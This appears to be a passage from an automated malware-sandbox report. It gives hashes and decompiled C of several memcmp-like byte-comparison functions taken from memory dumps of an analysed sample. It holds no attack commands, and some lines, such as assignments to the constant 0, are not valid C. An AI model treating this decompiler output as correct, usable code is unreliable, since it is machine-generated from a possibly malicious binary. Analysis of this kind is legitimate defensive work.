Instruction ID: 3bd2f762acb2896173618e5eb970aea460fedd6edf536ec2e8f547fd3fe9c417
Opcode Fuzzy Hash: b0e339a411bed3eeb4b1ebc583c3354927c8f25eee9689a5a94ddc396066fb49
Instruction Fuzzy Hash: F8A011302002028B83208F38AB082083AA8AA002C0B0280B8A828E0020EB3080008A0A

Uniqueness

Uniqueness Score: -1.00%

Function 004041EF, Relevance: .3, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004041EF(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}

0x004041ef
0x004041ef
0x004041f5
0x0040427c
0x0040427e
0x00404280
0x00000000
0x00000000
0x00404286
0x0040428c
0x00404313
0x00404315
0x00404317
0x00000000
0x00000000
0x0040431d
0x00404323
0x004043aa
0x004043ac
0x004043ae
0x00000000
0x00000000
0x004043b4
0x004043ba
0x00404441
0x00404443
0x00404445
0x00000000
0x00000000
0x0040444b
0x00404451
0x004044d8
0x004044da
0x004044dc
0x00000000
0x00000000
0x004044e8
0x00404570
0x00404572
0x00404574
0x00000000
0x00000000
0x0040457a
0x00404580
0x00404607
0x00404609
0x0040460b
0x0040460b
0x00000000
0x0040460b
0x0040458d
0x0040458f
0x004045a7
0x004045af
0x004045b1
0x004045c9
0x004045d1
0x004045d3
0x004045eb
0x004045f3
0x004045f5
0x004045fe
0x004045fe
0x00000000
0x004045f5
0x004045dc
0x004045e5
0x00000000
0x00000000
0x00000000
0x004045e5
0x004045ba
0x004045c3
0x00000000
0x00000000
0x00000000
0x004045c3
0x00404598
0x004045a1
0x00000000
0x00000000
0x00000000
0x004045a1
0x004044f6
0x004044f8
0x00404510
0x00404518
0x0040451a
0x00404532
0x0040453a
0x0040453c
0x00404554
0x0040455c
0x0040455e
0x00404567
0x00404567
0x00000000
0x0040455e
0x00404545
0x0040454e
0x00000000
0x00000000
0x00000000
0x0040454e
0x00404523
0x0040452c
0x00000000
0x00000000
0x00000000
0x0040452c
0x00404501
0x0040450a
0x00000000
0x00000000
0x00000000
0x0040450a
0x0040445e
0x00404460
0x00404478
0x00404480
0x00404482
0x0040449a
0x004044a2
0x004044a4
0x004044bc
0x004044c4
0x004044c6
0x004044cf
0x004044cf
0x00000000
0x004044c6
0x004044ad
0x004044b6
0x00000000
0x00000000
0x00000000
0x004044b6
0x0040448b
0x00404494
0x00000000
0x00000000
0x00000000
0x00404494
0x00404469
0x00404472
0x00000000
0x00000000
0x00000000
0x00404472
0x004043c7
0x004043c9
0x004043e1
0x004043e9
0x004043eb
0x00404403
0x0040440b
0x0040440d
0x00404425
0x0040442d
0x0040442f
0x00404438
0x00404438
0x00000000
0x0040442f
0x00404416
0x0040441f
0x00000000
0x00000000
0x00000000
0x0040441f
0x004043f4
0x004043fd
0x00000000
0x00000000
0x00000000
0x004043fd
0x004043d2
0x004043db
0x00000000
0x00000000
0x00000000
0x004043db
0x00404330
0x00404332
0x0040434a
0x00404352
0x00404354
0x0040436c
0x00404374
0x00404376
0x0040438e
0x00404396
0x00404398
0x004043a1
0x004043a1
0x00000000
0x00404398
0x0040437f
0x00404388
0x00000000
0x00000000
0x00000000
0x00404388
0x0040435d
0x00404366
0x00000000
0x00000000
0x00000000
0x00404366
0x0040433b
0x00404344
0x00000000
0x00000000
0x00000000
0x00404344
0x00404299
0x0040429b
0x004042b3
0x004042bb
0x004042bd
0x004042d5
0x004042dd
0x004042df
0x004042f7
0x004042ff
0x00404301
0x0040430a
0x0040430a
0x00000000
0x00404301
0x004042e8
0x004042f1
0x00000000
0x00000000
0x00000000
0x004042f1
0x004042c6
0x004042cf
0x00000000
0x00000000
0x00000000
0x004042cf
0x004042a4
0x004042ad
0x00000000
0x00000000
0x00000000
0x004041fb
0x004041fb
0x00404202
0x00404204
0x0040421c
0x0040421c
0x00404224
0x00404226
0x0040423e
0x0040423e
0x00404246
0x00404248
0x00404260
0x00404260
0x00404268
0x0040426a
0x00404273
0x00404273
0x00000000
0x0040426a
0x0040424e
0x00404251
0x0040425a
0x00403db2
0x00403db2
0x00404ba3
0x00404ba3
0x00000000
0x0040425a
0x0040422c
0x0040422f
0x00404238
0x00000000
0x00000000
0x00000000
0x00404238
0x0040420a
0x0040420d
0x00404216
0x00000000
0x00000000
0x00000000
0x00404216

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: a2f8e76f945d5026de02732b774f2ea7eabe4b13db49b9a13ca587bfdcb124bf
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: AAC1A3732050534ADF6D4A39843417FBAA15ED27B231A07BFD8F2DB2D4EE38C6689614

Uniqueness

Uniqueness Score: -1.00%

Function 00404624, Relevance: .3, Instructions: 341
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00404624(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}

0x00404624
0x00404624
0x0040462a
0x004046b2
0x004046b4
0x004046b6
0x00000000
0x00000000
0x004046bc
0x004046c2
0x00404749
0x0040474b
0x0040474d
0x00000000
0x00000000
0x00404753
0x00404759
0x004047e0
0x004047e2
0x004047e4
0x00000000
0x00000000
0x004047ea
0x004047f0
0x00404877
0x00404879
0x0040487b
0x00000000
0x00000000
0x00404887
0x0040490f
0x00404911
0x00404913
0x00000000
0x00000000
0x00404919
0x0040491f
0x004049a6
0x004049a8
0x004049aa
0x00000000
0x00000000
0x004049b0
0x004049b6
0x00404a3d
0x00404a3f
0x00404a41
0x00000000
0x00000000
0x00404a4f
0x00404a51
0x00404a69
0x00404a71
0x00404a73
0x004041cc
0x004041d4
0x004041d6
0x004041e3
0x004041e3
0x00000000
0x004041d6
0x00404a80
0x004041c6
0x00000000
0x00000000
0x00000000
0x00000000
0x004041c6
0x00404a5a
0x00404a63
0x00000000
0x00000000
0x00000000
0x00404a63
0x004049c3
0x004049c5
0x004049dd
0x004049e5
0x004049e7
0x004049ff
0x00404a07
0x00404a09
0x00404a21
0x00404a29
0x00404a2b
0x00404a34
0x00404a34
0x00000000
0x00404a2b
0x00404a12
0x00404a1b
0x00000000
0x00000000
0x00000000
0x00404a1b
0x004049f0
0x004049f9
0x00000000
0x00000000
0x00000000
0x004049f9
0x004049ce
0x004049d7
0x00000000
0x00000000
0x00000000
0x004049d7
0x0040492c
0x0040492e
0x00404946
0x0040494e
0x00404950
0x00404968
0x00404970
0x00404972
0x0040498a
0x00404992
0x00404994
0x0040499d
0x0040499d
0x00000000
0x00404994
0x0040497b
0x00404984
0x00000000
0x00000000
0x00000000
0x00404984
0x00404959
0x00404962
0x00000000
0x00000000
0x00000000
0x00404962
0x00404937
0x00404940
0x00000000
0x00000000
0x00000000
0x00404940
0x00404895
0x00404897
0x004048af
0x004048b7
0x004048b9
0x004048d1
0x004048d9
0x004048db
0x004048f3
0x004048fb
0x004048fd
0x00404906
0x00404906
0x00000000
0x004048fd
0x004048e4
0x004048ed
0x00000000
0x00000000
0x00000000
0x004048ed
0x004048c2
0x004048cb
0x00000000
0x00000000
0x00000000
0x004048cb
0x004048a0
0x004048a9
0x00000000
0x00000000
0x00000000
0x004048a9
0x004047fd
0x004047ff
0x00404817
0x0040481f
0x00404821
0x00404839
0x00404841
0x00404843
0x0040485b
0x00404863
0x00404865
0x0040486e
0x0040486e
0x00000000
0x00404865
0x0040484c
0x00404855
0x00000000
0x00000000
0x00000000
0x00404855
0x0040482a
0x00404833
0x00000000
0x00000000
0x00000000
0x00404833
0x00404808
0x00404811
0x00000000
0x00000000
0x00000000
0x00404811
0x00404766
0x00404768
0x00404780
0x00404788
0x0040478a
0x004047a2
0x004047aa
0x004047ac
0x004047c4
0x004047cc
0x004047ce
0x004047d7
0x004047d7
0x00000000
0x004047ce
0x004047b5
0x004047be
0x00000000
0x00000000
0x00000000
0x004047be
0x00404793
0x0040479c
0x00000000
0x00000000
0x00000000
0x0040479c
0x00404771
0x0040477a
0x00000000
0x00000000
0x00000000
0x0040477a
0x004046cf
0x004046d1
0x004046e9
0x004046f1
0x004046f3
0x0040470b
0x00404713
0x00404715
0x0040472d
0x00404735
0x00404737
0x00404740
0x00404740
0x00000000
0x00404737
0x0040471e
0x00404727
0x00000000
0x00000000
0x00000000
0x00404727
0x004046fc
0x00404705
0x00000000
0x00000000
0x00000000
0x00404705
0x004046da
0x004046e3
0x00000000
0x00000000
0x00000000
0x00404630
0x00404634
0x00404638
0x0040463a
0x00404652
0x00404652
0x0040465a
0x0040465c
0x00404674
0x00404674
0x0040467c
0x0040467e
0x00404696
0x00404696
0x0040469e
0x004046a0
0x004046a9
0x004046a9
0x00000000
0x004046a0
0x00404684
0x00404687
0x00404690
0x00000000
0x00000000
0x00000000
0x00404690
0x00404662
0x00404665
0x0040466e
0x00000000
0x00000000
0x00000000
0x0040466e
0x00404640
0x00404643
0x0040464c
0x00000000
0x00000000
0x00000000
0x0040464c
0x00403db2
0x00403db2
0x00404ba3

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 10bafbf83d49dcea2401119f80e89eb287b2c147e64a16d744a45eca8541c1f4
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: A2C1837320509349DF6D4639843417FBAA56EE27B231A0BBED4F2DB2C4EE38C668D514

Uniqueness

Uniqueness Score: -1.00%

Function 00403DBA, Relevance: .3, Instructions: 331
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00403DBA(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
